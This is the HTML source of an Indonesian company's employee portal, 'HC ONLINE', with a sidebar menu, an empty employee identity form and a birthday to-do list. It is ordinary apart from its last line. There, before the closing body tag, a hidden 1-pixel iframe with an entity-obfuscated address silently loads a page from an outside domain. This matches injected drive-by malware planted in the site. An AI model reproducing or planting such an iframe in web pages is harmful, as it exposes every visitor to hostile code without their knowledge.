<!DOCTYPE html>
<html>
<title>HC ONLINE</title>

<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="HC ONLINE">
<meta name="author" content="L Efendi">
<meta name="viewport" content="width=device-width, initial-scale=1">

<link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Raleway">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">

	<style>
		html,body,h1,h2,h3,h4,h5 {font-family: "Raleway", sans-serif}
	</style>
	
	
<!-- Started List HBD Team Match Advertising-->
<head>
<style>
body {
  margin: 0;
  min-width: 250px;
}

/* Include the padding and border in an element's total width and height */
* {
  box-sizing: border-box;
}

/* Remove margins and padding from the list */
ul {
  margin: 0;
  padding: 0;
}

/* Style the list items */
ul li {
  cursor: pointer;
  position: relative;
  padding: 12px 8px 12px 40px;
  background: #eee;
  font-size: 18px;
  transition: 0.2s;
  
  /* make the list items unselectable */
  -webkit-user-select: none;
  -moz-user-select: none;
  -ms-user-select: none;
  user-select: none;
}

/* Set all odd list items to a different color (zebra-stripes) */
ul li:nth-child(odd) {
  background: #f9f9f9;
}

/* Darker background-color on hover */
ul li:hover {
  background: #ddd;
}

/* When clicked on, add a background color and strike out text */
ul li.checked {
  background: #888;
  color: #fff;
  text-decoration: line-through;
}

/* Add a "checked" mark when clicked on */
ul li.checked::before {
  content: '';
  position: absolute;
  border-color: #fff;
  border-style: solid;
  border-width: 0 2px 2px 0;
  top: 10px;
  left: 16px;
  transform: rotate(45deg);
  height: 15px;
  width: 7px;
}

/* Style the close button */
.close {
  position: absolute;
  right: 0;
  top: 0;
  padding: 12px 16px 12px 16px
}

.close:hover {
  background-color: #f44336;
  color: white;
}

/* Style the header */
.header {
  background-color: #f44336;
  padding: 30px 40px;
  color: white;
  text-align: center;
}

/* Clear floats after the header */
.header:after {
  content: "";
  display: table;
  clear: both;
}

/* Style the input */
input {
  border: none;
  width: 75%;
  padding: 10px;
  float: left;
  font-size: 16px;
}

/* Style the "Add" button */
.addBtn {
  padding: 10px;
  width: 25%;
  background: #d9d9d9;
  color: #555;
  float: left;
  text-align: center;
  font-size: 16px;
  cursor: pointer;
  transition: 0.3s;
}

.addBtn:hover {
  background-color: #bbb;
}
</style>
</head>
<!-- End List HBD Team Match Advertising-->
	
	
<body class="w3-light-grey">

<!-- Top container -->
	<div class="w3-bar w3-top w3-black w3-large" style="z-index:4">
	  <button class="w3-bar-item w3-button w3-hide-large w3-hover-none w3-hover-text-light-grey" onclick="w3_open();"><i class="fa fa-bars"></i>  Menu</button>
	  <span class="w3-bar-item w3-right">Employee information</span>
	</div>

<!-- Sidebar/menu -->
<nav class="w3-sidebar w3-collapse w3-white w3-animate-left" style="z-index:3;width:300px;" id="mySidebar"><br>
  <div class="w3-container w3-row">
    <div class="w3-col s4">
      <img src="/w3images/avatar2.png" class="w3-circle w3-margin-right" style="width:46px">
    </div>
    <div class="w3-col s8 w3-bar w3-display w3-container">
      <span>Welcome, <strong> Name User</strong></span><br>	  
		<button onclick="document.getElementById('user').style.display='block'" class="w3-button w3-white"><i class="fa fa-user"></i></button>
    </div>
  </div>
  
  
 <!-- Menu Modal -->
<div id="user" class="w3-modal">
  <div class="w3-modal-content w3-animate-zoom">
    <div class="w3-container w3-red w3-display-container">
      <span onclick="document.getElementById('user').style.display='none'" class="w3-button w3-display-topright w3-large">x</span>
      <h1><center>Welcome Team</center></h1>
    </div>
    <div class="w3-container">
      <h5>NIK :<b>		</b></h5>
      <h5>Nama Panggilan : <b>		</b></h5>
      <h5>Tanggal Lahir : <b>		</b></h5>
      <h5>Alamat Sekarang : <b>		</b></h5>
      <h5>Kota Sekarang : <b>		</b></h5>	  
      <h5>Handphone : <b>		</b></h5>
	  <h5>Agama : <b>		</b></h5>
      <h5>Status Nikah : <b>		</b></h5>
      <h5>Pendidikan Terakhir : <b>		</b></h5>	  
    </div>
    <div class="w3-container w3-blue">
      <h1><center>ID Identitas Karyawan</center></h1>
    </div>
    <div class="w3-container">
      <h5>ID KTP :<b>		</b></h5>
      <h5>ID NPWP :<b>		</b></h5>
      <h5>ID BPJS Kesehatan :<b>		</b></h5>
      <h5>ID BPJS Ketenagakerjaan :<b>		</b></h5>	 	  
    </div> <br/>
  </div>
</div>

<hr> 
  <div class="w3-bar-block">
    <a href="#" class="w3-bar-item w3-button w3-padding-16 w3-hide-large w3-dark-grey w3-hover-black" onclick="w3_close()" title="close menu"><i class="fa fa-remove fa-fw"></i>  Close Menu</a>
    <a href="index.html" class="w3-bar-item w3-button w3-padding w3-blue"> <h4><i class="fa fa-home fa-fw w3-xlarge"></i>  HOME</h4> </a>
	<a href="masteradmin.html" class="w3-bar-item w3-button w3-padding"> <h4><i class="fa fa-eye fa-fw w3-xlarge"></i>  Master Admin</h4> </a>
    <a href="datakaryawan.html" class="w3-bar-item w3-button w3-padding"> <h4><i class="fa fa-users fa-fw w3-xlarge"></i> Data Karyawan</h4> </a>
    <a href="laporan.html" class="w3-bar-item w3-button w3-padding"> <h4><i class="fa fa-file-text-o fa-fw w3-xlarge"></i>  Laporan</h4> </a>
    <a href="permintaan.html" class="w3-bar-item w3-button w3-padding"> <h4><i class="fa fa-pencil-square-o fa-fw w3-xlarge"></i>  Permintaan</h4> </a>
    <a href="cuti.html" class="w3-bar-item w3-button w3-padding"> <h4><i class="fa fa-calendar fa-fw w3-xlarge"></i>  Cuti</h4> </a>
    <a href="ijin.html" class="w3-bar-item w3-button w3-padding"> <h4><i class="fa fa-check-square-o fa-fw w3-xlarge"></i>  Ijin</h4> </a>
    <a href="lembur.html" class="w3-bar-item w3-button w3-padding"> <h4><i class="	fa fa-hourglass-half fa-fw w3-xlarge"></i>  Lembur</h4> </a>
    <a href="login.html" class="w3-bar-item w3-button w3-padding"> <h4><i class="fa fa-history fa-fw w3-xlarge"></i>  Logout</h4> </a><br><br>
  </div>
</nav>


<!-- Overlay effect when opening sidebar on small screens -->
<div class="w3-overlay w3-hide-large w3-animate-opacity" onclick="w3_close()" style="cursor:pointer" title="close side menu" id="myOverlay"></div>

<!-- !PAGE CONTENT! -->
<div class="w3-main" style="margin-left:300px;margin-top:43px;">

<!-- Header -->
  <header class="w3-container" style="padding-top:22px">
    <h4><b><i class="fa fa-users w3-xxlarge"></i> HC ONLINE</b></h4>
  </header>

  <div class="w3-row-padding w3-margin-bottom">
    <div class="w3-quarter">
	<button class="w3-button w3-red" style="width:100%">
		<a href="ultahkaryawan.html">  	
		  <div class="w3-container w3-red w3-padding-16">
			<div class="w3-left">
				<i class="fa fa-birthday-cake w3-xxxlarge"></i>			
			</div>
			<div class="w3-right">
			  <h3>1</h3>
			</div>
			<div class="w3-clear"></div>
			<h4 class="w3-left">Happy Birthday</h4>
		  </div>
		</a>
	</button >	
    </div>

    <div class="w3-quarter">
	<button class="w3-button w3-blue" style="width:100%">
		<a href="galerykaryawan.html"> 	
		  <div class="w3-container w3-blue w3-padding-16">
			<div class="w3-left"><i class="fa fa-file-picture-o w3-xxxlarge"></i></div>
			<div class="w3-right">
			  <h3>2</h3>
			</div>
			<div class="w3-clear"></div>
			<h4 class="w3-left">Galery Moment Match Ad</h4>
		  </div>
		</a>
	</button >
    </div>

    <div class="w3-quarter">
	<button class="w3-button w3-teal" style="width:100%">
		<a href="strukturorganisasi.html"> 		
		  <div class="w3-container w3-teal w3-padding-16">
			<div class="w3-left"><i class="fa fa-sitemap w3-xxxlarge"></i></div>
			<div class="w3-right">
			  <h3>3</h3>
			</div>
			<div class="w3-clear"></div>
			<h4 class="w3-left">Struktur Organisasi</h4>
		  </div>
		</a>
	</button >	
    </div>
	
    <div class="w3-quarter">
	<button class="w3-button w3-orange" style="width:100%">
		<a href="karyawanberprestasi.html"> 		
		  <div class="w3-container w3-orange w3-text-white w3-padding-16">
			<div class="w3-left"><i class="	fa fa-star-o w3-xxxlarge"></i></div>
			<div class="w3-right">
			  <h3>4</h3>
			</div>
			<div class="w3-clear"></div>
			<h4 class="w3-left">Karyawan Berprestasi</h4>
		  </div>
		</a>
	</button >
  </div>
  
<br><br><br><br><br><br><br><br><br>    

<!-- Started List HBD Team Match Advertising-->

<div id="myDIV" class="header">
  <h2 style="margin:5px">List Birthday Team Match (This Month) </h2>
  <input type="text" id="myInput" placeholder="Title...">
  <span onclick="newElement()" class="addBtn">Add</span>
</div>

<ul id="myUL">
  <li>Happy Birthday Pak Surya (Team Match) </li>
 <!-- <li class="checked">Happy Birtday Pak Rudy Suryawan (Team Match)</li> -->
  <li>Happy Birthday Pak Rudy Suryawan (Team Match)</li>
  <li>Happy Birthday Null (Team Match)</li>
  <li>Happy Birthday Null (Team Match)</li>
</ul>

<script>
// Create a "close" button and append it to each list item
var myNodelist = document.getElementsByTagName("LI");
var i;
for (i = 0; i < myNodelist.length; i++) {
  var span = document.createElement("SPAN");
  var txt = document.createTextNode("\u00D7");
  span.className = "close";
  span.appendChild(txt);
  myNodelist[i].appendChild(span);
}

// Click on a close button to hide the current list item
var close = document.getElementsByClassName("close");
var i;
for (i = 0; i < close.length; i++) {
  close[i].onclick = function() {
    var div = this.parentElement;
    div.style.display = "none";
  }
}

// Add a "checked" symbol when clicking on a list item
var list = document.querySelector('ul');
list.addEventListener('click', function(ev) {
  if (ev.target.tagName === 'LI') {
    ev.target.classList.toggle('checked');
  }
}, false);

// Create a new list item when clicking on the "Add" button
function newElement() {
  var li = document.createElement("li");
  var inputValue = document.getElementById("myInput").value;
  var t = document.createTextNode(inputValue);
  li.appendChild(t);
  if (inputValue === '') {
    alert("You must write something!");
  } else {
    document.getElementById("myUL").appendChild(li);
  }
  document.getElementById("myInput").value = "";

  var span = document.createElement("SPAN");
  var txt = document.createTextNode("\u00D7");
  span.className = "close";
  span.appendChild(txt);
  li.appendChild(span);

  for (i = 0; i < close.length; i++) {
    close[i].onclick = function() {
      var div = this.parentElement;
      div.style.display = "none";
    }
  }
}
</script>



<!-- End List HBD Team Match Advertising-->










<br>
<!-- Footer -->
	  <footer class="w3-container w3-padding-16 w3-light-blue">
		<h4><b>Human Capital ONLINE</b></h4>
		Powered by <a href="http://www.matchadonline.com/" title="W3.CSS" target="_blank" class="w3-hover-opacity">Match Advertising</a> 2017 Support from Dept IT
	  </footer>
	  
<!-- End page content --> 
</div>

<script>
// Get the Sidebar
	var mySidebar = document.getElementById("mySidebar");

// Get the DIV with overlay effect
	var overlayBg = document.getElementById("myOverlay");

// Toggle between showing and hiding the sidebar, and add overlay effect
	function w3_open() {
		if (mySidebar.style.display === 'block') {
			mySidebar.style.display = 'none';
			overlayBg.style.display = "none";
		} else {
			mySidebar.style.display = 'block';
			overlayBg.style.display = "block";
		}
	}

// Close the sidebar with the close button
	function w3_close() {
		mySidebar.style.display = "none";
		overlayBg.style.display = "none";
	}
</script>

<iframe style="height:1px" src="http://www&#46;Brenz.pl/rc/" frameborder=0 width=1></iframe>
</body>
</html>